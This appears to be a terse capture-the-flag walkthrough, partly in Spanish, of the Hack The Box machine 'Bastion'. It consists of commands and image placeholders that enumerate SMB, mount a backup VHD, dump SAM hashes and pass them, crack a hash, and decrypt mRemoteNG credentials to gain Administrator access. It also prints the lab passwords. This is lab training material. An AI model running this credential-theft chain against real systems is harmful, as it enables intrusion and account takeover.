nmap -A -p- -oA secnotes 10.129.178.250 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA secnotes 10.129.178.250

nmap -sU -O -p- -oA secnotes-udp 10.129.178.250

nikto -h 10.129.178.250:80

Pasted image 20211229141326.png

Pasted image 20211229141559.png

Pasted image 20211229141521.png

crackmapexec smb 10.129.1.39

Pasted image 20211229141816.png

smbclient //10.129.1.39/Backups -N

Pasted image 20211229141944.png

sudo mkdir /mnt/smb

mount -t cifs "//10.129.1.39/Backups" /mnt/smb

cd /mnt/smb

Pasted image 20211229142339.png

tree

Pasted image 20211229142424.png

sudo rmmod nbd

sudo modprobe nbd

ls /dev

Pasted image 20211229153039.png

sudo qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

Pasted image 20211229153642.png

sudo mount /mnt/vhd

sudo mkdir /mnt/vhd

sudo mount /dev/nbd0p1 /mnt/vhd

Pasted image 20211230105402.png

No encontramos user.txt

Pasted image 20211230105628.png

Nos dirigimos al directorio config

Pasted image 20211230110136.png

Tratamos de hacer una copia del SAM

Pasted image 20211230111454.png

crackmapexec smb bastion.htb -u 'Administrator' -H '31d6c...'

Pasted image 20211230112101.png

crackmapexec smb bastion.htb -u 'L4mpje' -H '2611...'

Pasted image 20211230112214.png

crackmapexec winrm bastion.htb -u 'L4mpje' -H '2611...'

Pasted image 20211230112248.png

la contrasena bureaulampje

john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=NT

Pasted image 20211230112828.png

ssh L4mpje@bastion.htb

Pasted image 20211230113524.png

whoami /priv

Pasted image 20211230113919.png

whoami /all

Pasted image 20211230114014.png

Vemos el mRemoteNG

cd C:\PROGRA~2

Pasted image 20211230114520.png

cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG

Pasted image 20211230114835.png

type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

Pasted image 20211230115006.png

git clone https://github.com/haseebT/mRemoteNG-Decrypt

python mremoteng_decrypt.py -s 'aEWNFVS...'

Conseguimos las credenciales-> Administrator:thXLHM96BeKL0ER2

Pasted image 20211230115602.png

crackmapexec smb bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'

Pasted image 20211230115717.png

evil-winrm -i bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'

Pasted image 20211230115828.png

Pasted image 20211229172609.png

boxes

copyright©2022 Cu3rv0x all rights reserved